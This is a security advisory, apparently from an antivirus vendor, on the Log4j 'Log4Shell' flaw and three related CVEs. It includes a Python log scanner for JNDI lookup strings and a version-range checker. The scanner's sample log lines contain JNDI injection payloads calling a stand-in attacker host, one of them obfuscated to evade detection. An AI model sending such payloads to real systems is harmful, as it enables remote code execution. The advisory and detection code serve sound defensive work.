A critical zero-day vulnerability (CVE-2021-44228) was recently discovered in Apache Log4j, the popular Java open source logging library used in numerous applications worldwide. This maximum-severity vulnerability has been named ‘Log4Shell’ and, if exploited, allows remote attackers to take control of the vulnerable system and run arbitrary code remotely.
According to some security researchers, the bug is the most serious of the last decade because of how easy it is to exploit and the sheer number of affected enterprise applications and cloud services. It is among the most high-profile security vulnerabilities on the Internet right now and carries a severity score of 10, the highest rating possible.
After Log4Shell, a few more vulnerabilities were identified in the same Log4j library: CVE-2021-45046 (remote code execution), CVE-2021-45105 (denial of service) and CVE-2021-4104 (remote code execution).
Apache has addressed this vulnerability by publishing a security advisory with details of the patch and mitigations.
What is the Apache Log4j “Log4Shell” vulnerability?
Log4j is an open source Java-based logging utility from the Apache Logging Services project. Logging untrusted or user-controlled data with a vulnerable version of Log4j may result in remote code execution (RCE) against your application. This includes logged errors such as exception traces, authentication failures and other unexpected vectors of user-controlled input.
An unauthorized, remote attacker can exploit this by sending a specially crafted JNDI injection request to a target server, which writes it to a log file and thereby triggers arbitrary code execution. This allows attackers to load malicious payloads from LDAP servers or other JNDI services such as DNS, RMI, NIS, NDS, CORBA and IIOP while the message lookup mechanism is active.
- Affected Log4j versions: all versions from 2.0-beta9 to 2.14.1
- Severity: Critical
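The lookup mechanism described above is what a defender has to spot in logs and web-server access records. The following is an added Python example, not code from the original article or its vendor, that scans log lines for Log4j lookup strings. Because the keyword can be hidden inside nested `${lower:...}`, `${upper:...}` or `${...:-x}` lookups that a plain search for `${jndi:` misses, the scanner first flattens those inner lookups and only then looks for the JNDI lookup and the protocol it names. The sample log lines and the host name `attacker.example` are constructed for the example.

```python
import re

# Constructed sample log lines (not taken from the article or any real system).
# Line 3 hides the "jndi" keyword inside a nested lookup, a known way to slip
# past detectors that only grep for the literal string "${jndi:".
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:rmi://attacker.example/x}"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 401 "${env:HOME}"',
]

# An innermost lookup: ${...} whose body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# A (possibly already flattened) JNDI lookup and the JNDI protocol it names.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]*)", re.IGNORECASE)


def _flatten_one(match):
    """Resolve one innermost lookup of the kinds used for obfuscation:
    ${lower:X} -> x, ${upper:X} -> X, ${anything:-X} -> X (default-value syntax).
    Any other lookup, including ${jndi:...} itself, is left untouched."""
    body = match.group(1)
    if ":-" in body:
        return body.split(":-", 1)[1]
    name, _, arg = body.partition(":")
    name = name.strip().lower()
    if name == "lower":
        return arg.lower()
    if name == "upper":
        return arg.upper()
    return match.group(0)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Repeatedly flatten obfuscating lookups from the inside out. The round
    limit keeps pathological input from looping forever."""
    for _ in range(max_rounds):
        flattened = _INNER.sub(_flatten_one, text)
        if flattened == text:
            break
        text = flattened
    return text


def scan_line(line: str):
    """Return None for a clean line, else a dict describing the JNDI lookup found."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {"protocol": m.group(1).lower() or "unknown",
            "obfuscated": norm != line,
            "normalized": norm}


def scan_lines(lines):
    """(1-based line number, finding) for every line carrying a JNDI lookup."""
    findings = []
    for number, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            findings.append((number, hit))
    return findings


if __name__ == "__main__":
    for number, hit in scan_lines(SAMPLE_LOG_LINES):
        flag = " (obfuscated)" if hit["obfuscated"] else ""
        print(f"line {number}: JNDI lookup via {hit['protocol']}{flag}")
```

Run against the constructed lines, the scanner reports line 2 (a plain LDAP lookup) and line 3 (an RMI lookup that only becomes visible after the nested `${lower:j}` is flattened), while the `${env:HOME}` line is ignored because it names no JNDI lookup. The flattening only handles the handful of lookups commonly abused for obfuscation; a finding is a trigger for investigation and patching, not proof of compromise.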
Why is the “Log4Shell” vulnerability critical?
An unauthorized, remote attacker can exploit this vulnerability with simple web requests aimed at vulnerable systems. A successful exploit can execute arbitrary code and take complete control of the targeted system.
Apache Log4j is widely used in cloud and enterprise software services, so the publicly available exploit code, easy exploitation and detection evasion techniques make this vulnerability extremely dangerous.
CVE-2021-45046, CVE-2021-45105 and CVE-2021-4104 in Log4j:
CVE-2021-45046 affects versions 2.0-beta9 to 2.15.0, except 2.12.2. It was initially rated “low” severity but was later upgraded to a “critical” remote code execution vulnerability. With a non-default Pattern Layout that includes a Context Lookup in the logging configuration, and with control over Thread Context Map (MDC) data, attackers can craft malicious input using a JNDI lookup pattern that can cause denial of service (DoS) or information leakage and execute remote code.
- Affected Log4j versions: all versions from 2.0-beta9 to 2.15.0, except 2.12.2
- Severity: Critical
CVE-2021-45105 affects Log4j versions 2.0-beta9 to 2.16.0. In non-default configurations, attackers who control Thread Context Map data can send requests containing recursive lookups, which may cause a denial of service.
- Affected Log4j versions: all versions from 2.0-beta9 to 2.16.0
- Severity: High
CVE-2021-4104 affects Log4j version 1.2 when Log4j is configured to use JMSAppender, which performs JNDI requests and may result in remote code execution.
- Affected Log4j versions: version 1.2
- Severity: High
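The version ranges above are what an inventory check has to compare against. The following is an added Python example, not code from the original article or its vendor, that encodes exactly the affected ranges listed in this article, parses Log4j version strings (including the `2.0-beta9` form) into comparable tuples, and maps a jar file name to the CVEs that apply. Two assumptions are built in: a final release sorts after a beta of the same number (`2.0-beta9 < 2.0 < 2.0.1`), and the article's "version 1.2" for CVE-2021-4104 is read as the whole 1.2.x line. The jar names in the usage section are constructed, not from any real inventory; the article names 2.12.2 only as an exception for CVE-2021-45046, so for branch-specific fixes beyond that the vendor advisory remains the authority.

```python
import re
from typing import List, NamedTuple, Optional, Tuple

# (major, minor, patch, beta) where beta is +inf for a final release, so that
# 2.0-beta9 < 2.0 < 2.0.1 under plain tuple comparison.
Version = Tuple[int, int, float, float]
INF = float("inf")


def parse_version(text: str) -> Version:
    """Parse '2.14.1', '2.0-beta9' or '1.2' into a comparable tuple."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-beta(\d+))?", text.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {text!r}")
    major, minor, patch, beta = m.groups()
    return (int(major), int(minor), int(patch or 0),
            int(beta) if beta is not None else INF)


class Advisory(NamedTuple):
    cve: str
    lo: Version                     # inclusive lower bound
    hi: Version                     # inclusive upper bound
    excluded: Tuple[Version, ...]   # versions inside the range that are not affected
    impact: str
    severity: str


# Affected ranges exactly as the article lists them.
ADVISORIES = [
    Advisory("CVE-2021-44228", parse_version("2.0-beta9"), parse_version("2.14.1"), (),
             "remote code execution (Log4Shell)", "Critical"),
    Advisory("CVE-2021-45046", parse_version("2.0-beta9"), parse_version("2.15.0"),
             (parse_version("2.12.2"),), "remote code execution", "Critical"),
    Advisory("CVE-2021-45105", parse_version("2.0-beta9"), parse_version("2.16.0"), (),
             "denial of service", "High"),
    # The article says "version 1.2"; this is read as the whole 1.2.x line
    # (assumption), hence the open-ended patch slot in the upper bound.
    Advisory("CVE-2021-4104", parse_version("1.2"), (1, 2, INF, INF), (),
             "remote code execution via JMSAppender", "High"),
]


def applicable_cves(version: str) -> List[str]:
    """CVE ids from the article whose affected range contains this version."""
    v = parse_version(version)
    return [a.cve for a in ADVISORIES if a.lo <= v <= a.hi and v not in a.excluded]


# log4j-core-2.x.y.jar (the artifact carrying the lookup code) or the 1.x
# naming log4j-1.2.y.jar; a full path is accepted.
_JAR = re.compile(r"log4j(?:-core)?-([0-9][0-9A-Za-z.\-]*)\.jar$")


def version_from_jar_name(filename: str) -> Optional[str]:
    m = _JAR.search(filename)
    return m.group(1) if m else None


def report(jar_names) -> dict:
    """Map each jar name to the listed CVEs that apply (empty for unknown names)."""
    result = {}
    for name in jar_names:
        ver = version_from_jar_name(name)
        result[name] = applicable_cves(ver) if ver else []
    return result


if __name__ == "__main__":
    # Constructed file names, not taken from any real inventory.
    sample = ["/opt/app/lib/log4j-core-2.14.1.jar", "log4j-core-2.15.0.jar",
              "log4j-core-2.17.0.jar", "log4j-1.2.17.jar"]
    for name, cves in report(sample).items():
        print(f"{name}: {', '.join(cves) or 'none of the listed CVEs'}")
```

Feeding the function the jar names found by a file-system search turns the article's ranges into a per-host list of open CVEs; anything older than the latest release still warrants the upgrade the mitigation section calls for, regardless of which individual ranges match.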
Mitigation of “Log4Shell”
- Update to the latest Apache Log4j version immediately.
- Read the vendor advisory.
- Update network security solutions and endpoints with the latest definitions.
Quick Heal coverage for “Log4Shell”
We’ve published IPS rules to detect and block remote attacks on vulnerable Log4j installations. We will continue to monitor developments around this threat and improve our detections if necessary. We encourage all our customers to patch their systems properly and update their anti-virus software with the latest VDB updates.